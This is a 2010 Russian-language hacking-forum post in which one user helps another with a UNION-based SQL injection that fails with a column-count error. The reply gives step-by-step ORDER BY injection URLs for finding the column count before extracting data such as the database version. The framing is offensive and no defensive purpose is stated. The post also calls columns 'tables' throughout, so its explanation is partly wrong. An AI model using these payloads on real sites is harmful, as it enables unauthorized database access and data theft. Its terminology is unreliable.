Тема
:
SQL - INJECTION
Показать сообщение отдельно
#
9
10.02.2010, 01:00
Jmylia
Познающий
Регистрация: 17.07.2009
Сообщений: 36
С нами:
8852726
Репутация:
-3
Цитата:
>The used SELECT statements have a different number of columns
Это вылезает вместо просмотра таблиц БД юзера
http://sitename.net/showsoft.php?id=...ion+select+1/*
Чооооооо делать, не подскажете?))))
================================================== ========
Если я в этом что и рублю то, вы неправильно опеределили количество таблиц(одной быть походу не может)
Сначала нужно узнать количество а уже потом просматривать версию БД и т.д.
Сначала узнайте количество таблиц при помощи команды order+by:
Цитата:
Следующим шагом нам необходимо узнать количество таблиц. Это делается при помощи команды order+by
http://site.com/main.php?id=12+order+by+1/*
- при введении этой команды ошибка должна исчезнуть потомучто количество таблиц больше чем 1...
http://site.com/main.php?id=12+order+by+10000/*
- ошибка появляется вновь потомучто количество таблиц меньше чем 10000
http://site.com/main.php?id=12+order+by+10/*
- ошибка исчезла а при введении
http://site.com/main.php?id=12+order+by+11/*
появилась, из этого следует что количество таблиц 10.
Jmylia
Посмотреть профиль
Репутация
Найти все сообщения от Jmylia
Добавить в друзья